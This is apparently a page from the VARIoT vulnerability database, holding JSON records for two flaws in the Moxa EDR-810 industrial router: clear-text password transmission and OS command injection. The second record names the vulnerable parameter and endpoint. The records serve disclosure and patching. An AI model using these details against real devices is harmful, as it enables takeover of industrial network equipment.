Search criteria
21 vulnerabilities found for edr-810 by moxa
VAR-201805-0122
Vulnerability from variot - Updated: 2023-12-18 14:05An exploitable clear text transmission of password vulnerability exists in the web server and telnet functionality of Moxa EDR-810 V4.1 build 17030317. An attacker can look at network traffic to get the admin password for the device. The attacker can then use the credentials to login as admin. Moxa EDR-810 Contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa. The vulnerability is caused by the program transmitting passwords in plain text
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0122",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11720"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013428"
},
{
"db": "NVD",
"id": "CVE-2017-12123"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1630"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12123"
}
]
},
"cve": "CVE-2017-12123",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-12123",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2018-11720",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "VHN-102614",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "NONE",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-12123",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-12123",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-12123",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-11720",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-1630",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-102614",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11720"
},
{
"db": "VULHUB",
"id": "VHN-102614"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013428"
},
{
"db": "NVD",
"id": "CVE-2017-12123"
},
{
"db": "NVD",
"id": "CVE-2017-12123"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1630"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable clear text transmission of password vulnerability exists in the web server and telnet functionality of Moxa EDR-810 V4.1 build 17030317. An attacker can look at network traffic to get the admin password for the device. The attacker can then use the credentials to login as admin. Moxa EDR-810 Contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa. The vulnerability is caused by the program transmitting passwords in plain text",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12123"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013428"
},
{
"db": "CNVD",
"id": "CNVD-2018-11720"
},
{
"db": "VULHUB",
"id": "VHN-102614"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-12123",
"trust": 3.1
},
{
"db": "TALOS",
"id": "TALOS-2017-0475",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013428",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1630",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11720",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-97223",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-102614",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11720"
},
{
"db": "VULHUB",
"id": "VHN-102614"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013428"
},
{
"db": "NVD",
"id": "CVE-2017-12123"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1630"
}
]
},
"id": "VAR-201805-0122",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11720"
},
{
"db": "VULHUB",
"id": "VHN-102614"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11720"
}
]
},
"last_update_date": "2023-12-18T14:05:28.308000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "MoxaEDR-810 password plaintext transmission vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132221"
},
{
"title": "Moxa EDR-810 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99949"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11720"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013428"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1630"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-522",
"trust": 1.1
},
{
"problemtype": "CWE-255",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-102614"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013428"
},
{
"db": "NVD",
"id": "CVE-2017-12123"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://www.talosintelligence.com/vulnerability_reports/talos-2017-0475"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12123"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12123"
},
{
"trust": 0.6,
"url": "https://talosintelligence.com/vulnerability_reports/talos-2017-0475"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11720"
},
{
"db": "VULHUB",
"id": "VHN-102614"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013428"
},
{
"db": "NVD",
"id": "CVE-2017-12123"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1630"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-11720"
},
{
"db": "VULHUB",
"id": "VHN-102614"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013428"
},
{
"db": "NVD",
"id": "CVE-2017-12123"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1630"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11720"
},
{
"date": "2018-05-14T00:00:00",
"db": "VULHUB",
"id": "VHN-102614"
},
{
"date": "2018-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013428"
},
{
"date": "2018-05-14T20:29:00.313000",
"db": "NVD",
"id": "CVE-2017-12123"
},
{
"date": "2017-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1630"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-11720"
},
{
"date": "2022-12-09T00:00:00",
"db": "VULHUB",
"id": "VHN-102614"
},
{
"date": "2018-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-013428"
},
{
"date": "2022-12-09T01:58:38.377000",
"db": "NVD",
"id": "CVE-2017-12123"
},
{
"date": "2022-04-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-1630"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1630"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR-810 Vulnerabilities related to certificate and password management",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-013428"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-1630"
}
],
"trust": 0.6
}
}
VAR-201805-0121
Vulnerability from variot - Updated: 2023-12-18 14:01An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the rsakey_name= parm in the "/goform/WebRSAKEYGen" uri to trigger this vulnerability. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0121",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "eq",
"trust": 1.6,
"vendor": "moxa",
"version": "4.1"
},
{
"model": "edr-810 series",
"scope": "eq",
"trust": 0.8,
"vendor": "moxa",
"version": "4.1 build 17030317"
},
{
"model": "edr-810 build",
"scope": "eq",
"trust": 0.6,
"vendor": "moxa",
"version": "v4.117030317"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11721"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013409"
},
{
"db": "NVD",
"id": "CVE-2017-12121"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1632"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:4.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12121"
}
]
},
"cve": "CVE-2017-12121",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-12121",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2018-11721",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-102612",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "talos-cna@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-12121",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-12121",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "talos-cna@cisco.com",
"id": "CVE-2017-12121",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-11721",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-1632",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-102612",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11721"
},
{
"db": "VULHUB",
"id": "VHN-102612"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013409"
},
{
"db": "NVD",
"id": "CVE-2017-12121"
},
{
"db": "NVD",
"id": "CVE-2017-12121"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1632"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the rsakey\\_name= parm in the \"/goform/WebRSAKEYGen\" uri to trigger this vulnerability. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The EDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and two layers of manageable switch functionality. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12121"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013409"
},
{
"db": "CNVD",
"id": "CNVD-2018-11721"
},
{
"db": "VULHUB",
"id": "VHN-102612"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-12121",
"trust": 3.1
},
{
"db": "TALOS",
"id": "TALOS-2017-0473",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013409",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1632",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-11721",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-97222",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-102612",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11721"
},
{
"db": "VULHUB",
"id": "VHN-102612"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-013409"
},
{
"db": "NVD",
"id": "CVE-2017-12121"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-1632"
}
]
},
"id": "VAR-201805-0121",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11721"
},
{
"db": "VULHUB",
"id": "VHN-102612"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-11721"
}
]
},
"last_update_date": "2023-12-18T14:01:17.623000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/product/edr-810.htm"
},
{
"title": "Patch for MoxaEDR-810 Command Injection Vulnerability (CNVD-2018-11721)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/132225"
},
{
"title": "Moxa EDR-810 Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=190033"
}
],
